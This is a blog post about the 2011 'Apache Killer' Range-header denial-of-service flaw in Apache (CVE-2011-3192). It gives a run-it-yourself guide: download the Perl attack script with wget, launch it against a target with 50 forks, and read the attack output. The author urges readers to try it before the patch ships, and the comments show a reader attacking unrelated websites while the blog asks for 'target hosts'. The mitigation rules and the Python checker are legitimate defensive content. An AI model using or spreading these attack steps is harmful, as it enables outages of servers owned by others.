We were following a thread about an Apache flaw discovered by KingCope.
The script sends multiple GET requests with dozens of “byte ranges” that eat up the server’s memory. The Range header lets a browser or download application fetch only the required parts of a file, which reduces bandwidth usage. This script instead sends dozens of unsorted ranges in the request header to make the Apache server malfunction.
It is a DoS condition on the Apache web server. I performed a test with a script written by @KingCope and can confirm that it eats up server resources in seconds.
The patch isn’t available from apache.org yet; we are still waiting for an update from Apache.
When someone executes this attack on your server, it will eat up 1 GB of RAM in 10 seconds, your CPU load average will hit 10, and your server will finally freeze. Test it out before Apache releases the fix 😀
How to use ‘Apache Killer’ Exploit on Linux (BackTrack 5) :
Before you use this tiny script, you have to install one Perl extension using the cpan utility.
cpan -i Parallel::ForkManager
Download the Perl script:
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl
Make it executable:
chmod u+x killapache.pl
Exploit your target:
perl killapache.pl example.com 50
Output:
host seems vuln
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
Mitigation for the Apache Killer Range header flaw?
The advice from the Full Disclosure mailing list is as follows:
More mitigation techniques are described at http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser
Option 1: (Apache 2.0 and 2.2)
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
Option 2: (Also for Apache 1.3)
# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
Update 1 (26 Aug, 2011):
You can use mod_rewrite to mitigate this flaw:
# Explicitly allow "range:0-" request from Flash uploaded client request
RewriteCond %{HTTP:range} ^bytes=0-$
RewriteRule .* - [L]
# @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2
# Negated, as in Option 2 above: forbid unless the header is absent/empty or holds 1..5 ranges.
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
For ModSecurity 1.x users, the following might do the trick, assuming they don’t really rely on or use Range request headers for anything.
# ApacheKiller - 2011 Flaw
SecFilterSelective HTTP_Range !(^$|^bytes=0-$)
SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$)
Supposed to say: we accept Range headers only when
- the value is empty ("^$") or the header is not present
- or the value is "bytes=0-"
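As an added example (not from this post or the mailing-list advisories), the Python below applies the three header policies quoted above to a Range header value and reports what each would do, using the same regexes; the sample header values are constructed.

```python
import re

# Patterns copied from the three mitigations quoted above (CVE-2011-3192).
# Option 1, SetEnvIf: flag the header when it contains 5 or more commas,
# i.e. more than 5 byte ranges. SetEnvIf matches anywhere in the value.
SETENVIF_BAD_RANGE = re.compile(r"(,.*?){5,}")
# Option 2, RewriteCond: allowed when absent/empty or 1..5 ranges;
# the rule negates this pattern and answers 403 (the [F] flag).
REWRITE_ALLOWED = re.compile(r"^bytes=[^,]+(,[^,]+){0,4}$|^$")
# ModSecurity 1.x: allowed only when absent/empty or exactly "bytes=0-".
MODSEC_ALLOWED = re.compile(r"^$|^bytes=0-$")


def count_ranges(value):
    """Number of comma-separated range specs in a Range header value."""
    if not value or not value.startswith("bytes="):
        return 0
    return sum(1 for part in value[len("bytes="):].split(",") if part.strip())


def decide(value, policy):
    """Outcome of one policy for a Range header value.

    value  - the header value, or None when the header is absent
             (mod_rewrite expands a missing %{HTTP:range} to "").
    policy - "setenvif", "rewrite" or "modsecurity".
    Returns "allow", "drop-header" (served without Range) or "forbid" (403).
    """
    value = value or ""
    if policy == "setenvif":
        return "drop-header" if SETENVIF_BAD_RANGE.search(value) else "allow"
    if policy == "rewrite":
        return "allow" if REWRITE_ALLOWED.search(value) else "forbid"
    if policy == "modsecurity":
        return "allow" if MODSEC_ALLOWED.search(value) else "forbid"
    raise ValueError("unknown policy: %s" % policy)


def many_ranges(n):
    """Constructed Range value with n single-byte ranges (test input only)."""
    return "bytes=" + ",".join("%d-%d" % (i, i) for i in range(n))


if __name__ == "__main__":
    # Constructed samples: missing header, a resume download,
    # a modest two-range request and one with dozens of ranges.
    for v in (None, "bytes=0-", "bytes=0-99,200-299", many_ranges(40)):
        shown = "(absent)" if v is None else v[:32]
        print("%-34s ranges=%2d" % (shown, count_ranges(v)), end="")
        for p in ("setenvif", "rewrite", "modsecurity"):
            print("  %s=%s" % (p, decide(v, p)), end="")
        print()
```

Note that Option 1 and Option 2 still admit up to five ranges, while the ModSecurity rule rejects every multi-range request, so pick the policy that matches what your clients actually need.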
Update 2: Apache releases fix
The complete release is available here.
If you are still unable to fix this flaw, you can contact me for FREE Consultancy
14 replies on “Apache Killer – Denial of Service Flaw in Apache WebServer”
Great article, we have taken this issue seriously and done the necessary protection before it’s too late, thanks buddy for this.
Dear Khan
Thanks for your feedback. If there is anything we can help with to mitigate this for you, feel free to contact us at tips at hackersgarage dot com.
[…] we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ […]
[…] have released a patch for the recent range bytes request flaw which we published a few days ago. This patch fixes the security flaw […]
Just working in 2 virtual machines; after that I tried to do it more than ten times on other websites running Apache (old versions, 2010) and no security, and I always got “Host does not seem vulnerable” :(
Hi Richard
It is possible they have upgraded to the latest version (patch from Apache).
You can send us your target hosts at tips [] HackersGarage.com
[…] months back we posted the Apache Range Byte flaw named ‘KillApache’ where we posted a Perl script that can be used to freeze Apache web […]
Was this a problem?
root@bt:~/Desktop/apache# perl killapache.pl
Can’t locate Parallel/ForkManager.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at killapache.pl line 13.
BEGIN failed--compilation aborted at killapache.pl line 13.
What is the solution?
The Perl extension is missing.
You can install it:
aptitude install libparallel-forkmanager-perl
thank you 🙂
How do I install that Perl extension in a Windows environment?
[…] have talked about ApacheKiller flaw in detail here with possible workaround to mitigate this […]
Where can I get that Perl extension?
Was this a problem?
host does not seem vulnerable
Can you help me?